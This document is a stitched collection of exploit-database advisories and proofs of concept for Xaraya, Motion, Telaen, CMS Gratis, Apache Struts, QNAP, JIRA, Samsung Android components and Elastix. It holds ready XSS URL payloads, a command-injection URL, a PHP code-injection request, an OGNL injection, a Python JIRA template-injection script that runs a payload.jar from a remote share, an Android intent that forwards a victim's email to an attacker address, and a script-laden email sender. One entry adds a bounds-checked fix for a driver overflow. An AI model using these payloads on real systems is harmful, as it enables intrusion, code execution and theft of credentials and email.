An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Xaraya 2.4.0-b1 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?func=modinfonew&id=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=modules&type=admin

http://www.example.com/index.php?block_id=7&func=modify_instance&interface=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=blocks&tab=config&type=admin

http://www.example.com/index.php?func=aliases&module=modules&name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&type=admin

http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3 
            
source: https://www.securityfocus.com/bid/60818/info

Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, execute arbitrary code, and cause denial-of-service conditions. Other attacks may also be possible.

Motion 3.2.12 is vulnerable; other versions may also be affected. 

Buffer-overflow:

# motion -c `python -c 'print "\x41"*1000'`
[0] Configfile
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
not fou:
Segmentation fault


# motion -p /tmp/`python -c 'print "\x41"*5000'`
Segmentation fault

Cross-site scripting:

http://www.example.com
<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>

Cross-site request forgery:

http://www.example.com/0/config/set?control_authentication=admin:mypassword
(Set admin password)
http://www.example.com/0/config/set?sql_query=SELECT%20user() (Arbitrary SQL query)
            
source: https://www.securityfocus.com/bid/60782/info

Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks. 

http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png 
            
source: https://www.securityfocus.com/bid/60760/info

FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

FtpLocate 2.02 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script> 
            
================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____ 
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/ 
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \ 
                                                      
================================================================================


######################################################
# Exploit Title: Sagem javascript injection 
# Date: 27/10/15
# Exploit Author: Soufiane Alami Hassani
# Version: FAST3304-V2
# Tested on: [Windows 8.1 Pro]
# Category : webapps
# Facebook : soufiane.a.hassani
# Email    : nios1515@gmail.com
######################################################


###########################
#By Soufiane Alami Hassani#
###########################

Vulnerability Description : You can change the password of the router even if you do not have access to it.

Exploit : In the address bar, copy and paste : "javascript:mimic_button('goto: 9096..')" and the router redirects you to another page where the password can be changed.

########################
Moroccan Are The Best .
########################


mimic_button('goto: 9096..')
            
source: https://www.securityfocus.com/bid/60290/info

Telaen is prone to an open-redirection vulnerability.

An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.

Versions prior to Telaen 1.3.1 are vulnerable. 

http://www.example.com/telaen/redir.php?http://www.malicious-site.com 
            
source: https://www.securityfocus.com/bid/60288/info

Telaen is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Versions prior to Telaen 1.3.1 are vulnerable. 

http://www.example.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script> 
            
source: https://www.securityfocus.com/bid/60337/info

CMS Gratis Indonesia is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

CMS Gratis Indonesia 2.2 beta 1 is vulnerable; other versions may also be affected. 

POST /cmsid/?setup=yes HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/cmsid/?setup=yes
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
hostname=localhost&mysql_user=root&mysql_pass=toor&mysql_db_name=cmsid&db_prefix=iw_');phpinfo();//&step_1=Next+%C2%BB%C2%BB
            
source: https://www.securityfocus.com/bid/60340/info

Telaen is prone to an information-disclosure vulnerability.

Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.

Versions prior to Telaen 1.3.1 are vulnerable.

http://www.example.com//telaen/inc/init.php
            
source: https://www.securityfocus.com/bid/60345/info

Apache Struts is prone to a remote OGNL expression injection vulnerability.

Remote attackers can exploit this issue to manipulate server-side objects and execute arbitrary commands within the context of the application.

Apache Struts versions 2.0.0 through 2.3.14.3 are vulnerable.

http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D

http://www.example.com/example/${#foo='Menu',#foo} 
            
source: https://www.securityfocus.com/bid/60354/info

QNAP VioStor NVR and QNAP NAS are prone to a remote code-execution vulnerability.

Successfully exploiting this issue may allow an attacker to execute arbitrary code with elevated privileges in the context of the user running the affected application.

The following are vulnerable:

QNAP VioStor NVR running firmware 4.0.3.
QNAP NAS 

http://www.example.com/cgi-bin/pingping.cgi?ping_ip=1;whoami 
            
############################################################################
# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability
# Date: 2015-08-26
# CVE ID: CVE-2015-5603
# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
#
# Product: JIRA and the HipChat for JIRA plugin.
# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
# Affected JIRA product versions: 6.3.5 <= version <  6.4.11
#
# Discovered internally by Atlassian (vendor)
# Proof of concept script by Chris Wood <chris@invivid.com>
#
# Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64
# Allows any authenticated JIRA user to execute code running as Tomcat identity
############################################################################

import urllib2
import json

# cookie of any authenticated session (ex. jira-user)
JSESSIONID = '541631B0D72EF1C71E932953F4760A70'

# jira server
RHOST      = 'http://192.168.2.15:8080'

# samba public share, read/write to anonymous users
CMD        = ' java -jar \\\\192.168.2.234\\public\\payload.jar '
data = {
    'message': ' $i18n.getClass().forName(\'java.lang.Runtime\').getMethod(\'getRuntime\', null).invoke(null, null).exec(\'' + CMD + '\').waitFor() '
}

opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID))
urllib2.install_opener(opener)
req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/')
req.add_header('Content-Type', 'application/json')

response = urllib2.urlopen(req, json.dumps(data))

print('##################################')
print('######### CVE-2015-5603 ##########')
print('##################################')
print(response.read())
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=490

The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.

Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND
Component: com.samsung.android.email.composer
Class Name: com.samsung.android.email.composer.service.QuickReplyService

The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number).

If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example:

Intent intent = new Intent();
intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND");
intent.setClassName("com.samsung.android.email.composer",
       "com.samsung.android.email.composer.service.QuickReplyService");
intent.putExtra("data", "{'original-msg-id':1, " +
       "'account-id':'project.zero.victim@gmail.com', " +
       "'msg':'Hello World!'," +
       "'title':'Hello Title'," +
       "'toList':'project.zero.attacker@gmail.com'}");
ComponentName name = MainActivity.this.startService(intent);

No permissions are required to send this service intent. If successfully sent, this will show up in a "sent email" notification and will be present in the user's sent email folder.
            
source: https://www.securityfocus.com/bid/60426/info

Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 

http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=493

The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server.

The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot:

static long m2m1shot_compat_ioctl32(struct file *filp,
                                unsigned int cmd, unsigned long arg)
{
...
        switch (cmd) {
        case COMPAT_M2M1SHOT_IOC_PROCESS:
        {
                struct compat_m2m1shot data;
                struct m2m1shot_task task;
                int i, ret;

                memset(&task, 0, sizeof(task));

                if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) {
                        dev_err(m21dev->dev,
                                "%s: Failed to read userdata\n", __func__);
                        return -EFAULT;
                }

                ...
                for (i = 0; i < data.buf_out.num_planes; i++) {
                        task.task.buf_out.plane[i].len =
                                                data.buf_out.plane[i].len;
                        ...
                }

In this code snippet, the data.buf_out.num_planes value is an attacker-controlled "u8" value and is not bounds checked. However, the task.task.buf_out.plane array is fixed in size (three elements), so a stack buffer overflow occurs during the loop shown above whenever num_planes exceeds three.
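A hardened form of the plane copy, as an added example that is not the Samsung driver's code: the structures are simplified stand-ins constructed here (they only mirror the fields the advisory discusses), and the fix is to reject a num_planes larger than the three-element array before the loop is allowed to index it.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* plane[] is fixed at three elements, as stated in the advisory. */
#define M2M1SHOT_MAX_PLANES 3

struct plane_len { uint32_t len; };

/* Constructed stand-in for the 32-bit compat struct read from user space:
 * num_planes is a u8 fully chosen by the caller. Not the real kernel layout. */
struct compat_buffer {
	uint8_t num_planes;
	struct plane_len plane[M2M1SHOT_MAX_PLANES];
};

/* Constructed stand-in for the kernel-side task buffer (lives on the stack
 * in the real ioctl handler, which is why the overflow is a stack overflow). */
struct task_buffer {
	uint8_t num_planes;
	struct plane_len plane[M2M1SHOT_MAX_PLANES];
};

/* Validates num_planes against the array bound before any indexing, so the
 * user value can never drive the loop past plane[2]. Follows the kernel
 * convention of returning 0 or a negative errno; dst is untouched on error. */
int copy_planes_checked(struct task_buffer *dst, const struct compat_buffer *src)
{
	if (src->num_planes > M2M1SHOT_MAX_PLANES)
		return -EINVAL;   /* the check the original loop lacks */

	memset(dst, 0, sizeof(*dst));
	dst->num_planes = src->num_planes;
	for (uint8_t i = 0; i < src->num_planes; i++)
		dst->plane[i].len = src->plane[i].len;
	return 0;
}

int main(void)
{
	struct compat_buffer ok  = { .num_planes = 2, .plane = { {4096}, {2048}, {0} } };
	struct compat_buffer bad = { .num_planes = 200 };   /* out-of-range u8 */
	struct task_buffer task;

	printf("valid request:     %d\n", copy_planes_checked(&task, &ok));  /* 0 */
	printf("oversized request: %d\n", copy_planes_checked(&task, &bad)); /* -EINVAL */
	return 0;
}
```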

Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=492

The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition.

The key observation is in the locking routine definitions in fimg2d.h:

#ifdef BLIT_WORKQUE
#define g2d_lock(x)             do {} while (0)
#define g2d_unlock(x)           do {} while (0)
#define g2d_spin_lock(x, f)     spin_lock_irqsave(x, f)
#define g2d_spin_unlock(x, f)   spin_unlock_irqrestore(x, f)
#else
#define g2d_lock(x)             mutex_lock(x)
#define g2d_unlock(x)           mutex_unlock(x)
#define g2d_spin_lock(x, f)     do { f = 0; } while (0)
#define g2d_spin_unlock(x, f)   do { f = 0; } while (0)
#endif

This means that the g2d_lock/g2d_unlock routines are no-ops when BLIT_WORKQUE is defined, which appears to be the default configuration. Unfortunately the alternative spin lock routines are not used consistently with this configuration. For example, the FIMG2D_BITBLT_BLIT ioctl command (with notes annotated as "PZ"):

ctx = file->private_data; /* PZ: ctx allocated at open(), lives on the heap. */

switch (cmd) {
case FIMG2D_BITBLT_BLIT:

	mm = get_task_mm(current);
	if (!mm) {
		fimg2d_err("no mm for ctx\n");
		return -ENXIO;
	}

	g2d_lock(&ctrl->drvlock); /* PZ: This is a no-op. */

	ctx->mm = mm;

	ret = fimg2d_add_command(ctrl, ctx, (struct fimg2d_blit __user *)arg);
	if (ret) {
		...
	}

	ret = fimg2d_request_bitblt(ctrl, ctx); /* PZ: Does stuff with the ctx. */
	if (ret) {
		...
	}

	g2d_unlock(&ctrl->drvlock); /* PZ: Another no-op */

As the lock macros are no-ops, a second process can change ctx->mm when the original process is still using the same ctx->mm (as long as it has access to the same file descriptor).

Reproduction steps:
1. Open /dev/fimg2d.
2. Fork to get two processes with different mm's that both have access to the fd.
3. Concurrently call the FIMG2D_BITBLT_BLIT ioctl from both processes.
4. One ioctl should have valid data; the other should fail.

At this point ctx->mm will hold invalid or freed data (freed if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38557.zip
            
# Source: https://code.google.com/p/google-security-research/issues/detail?id=494

'''
The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views an HTML email which contains HTML script tags or other events.

At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. 

This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server.

Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed.
'''

#!/usr/bin/env python

import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Change the details here appropriate to your configuration
me = "attacker@gmail.com"
me_password = "THIS IS NOT REAL"
you = "project.zero.test@gmail.com"
smtp_server = "smtp.gmail.com"

msg = MIMEMultipart('alternative')
msg['Subject'] = "Hello There!"
msg['From'] = me
msg['To'] = you

text = "Hello There!"
html = """\
<html>
  <head></head>
  <body>
   <p>
       <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>
    </p>
  </body>
</html>
"""

part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')

msg.attach(part1)
msg.attach(part2)

s = smtplib.SMTP_SSL(smtp_server)
s.login(me, me_password)
s.sendmail(me, you, msg.as_string())
s.quit()
            
source: https://www.securityfocus.com/bid/60262/info

Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
https://www.example.com/libs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>